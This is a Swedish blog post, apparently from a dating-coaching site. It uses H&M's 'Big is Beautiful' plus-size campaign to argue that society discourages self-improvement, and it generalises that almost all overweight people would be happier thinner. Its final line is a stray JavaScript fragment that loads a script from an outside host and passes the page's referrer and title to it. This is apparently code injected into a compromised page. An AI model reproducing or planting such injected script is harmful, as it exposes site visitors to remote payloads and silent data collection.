Igår var jag förbi HM en sväng efter jobbet, och såg då reklamskylten: BiB – Big is Beautiful, en kampanj för att sälja deras kläder till ”plus-size” kvinnor. Det här fick mig att börja tänka. Ur ett företagsperspektiv så är det inga tvivel om att det är en bra kampanj, det finns en efterfrågan och en rätt klart definierad målgrupp som inte får alltför mycket uppmärksamhet.

Men i ett större perspektiv? Det är få, om det alls finns några, som gillar att vara överviktiga, som faktiskt har valt det själva. Så gott som samtliga överviktiga skulle, kan jag nästan garantera, må bättre om de blev av med sin övervikt. Inte minst ur ett hälsoperspektiv, utan psykiskt också. Visst är det rådande ”idealet” att vara trådsmal, det förnekar jag inte, men man tutar ändå i oss att ”man är bra som man är”. Vårt chodeande driver konsumtion. Vi köper dyra kläder, parfymer, bilar, klockor osv, för att de är statusbringande. Självklart så vill samhället hålla oss kvar där vi är, om ingen konsumerar, vad händer då?

Jag funderade vidare och fann en del klara paraleller till vad vi lär ut på bootcamp. Samhället vill att du ska chodea. Dina kompisar vill att du ska chodea, din mamma vill att du ska chodea. Till och med en liten del av dig vill att du ska chodea ibland. Man stöter ofta på fenomenet när man presenterar konceptet med att utveckla sig själv och sin oförmåga att handskas med kvinnor. ”Va? Du är ju bra som du är – du behöver inte ändra på dig”, ”Så man ska bli en annan person för att få mer tjejer?”, ”Det där fungerar inte ändå” och så vidare in i oändligheten.

En människa som utvecklas mycket och förändras till det positiva är ett hot. Han tar mer plats, och klättrar i den sociala hierarkin. Han är inte exakt där man förväntar sig. Den sociala programmeringen menar att man skall hålla sig på sin plats, och som den gode jante dikterar: ”inte tro att man är något”.

Men det är verkligen inget konstigt. Lika lite som att det är konstigt att gå till en gitarrlärare för att lära sig spela sitt instrument, eller en fotbollstränare för att lära sig sparka boll, är det fullt normalt att gå till c-r för att behärska sina svårigheter rörande det täcka könet.

Det är viktigt att komma ihåg att man kan stöta på motstånd hos även ens nära och kära när man utvecklas mycket, men låt er inte stoppas av det, mina vänner. Så även om ”big is beautiful”, ”du är bra som du är” och ”du ska inte tro att du är något” hamras in dagligen, skit i det gå din väg, så länge du verkligen valt den själv.

- Pontus

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;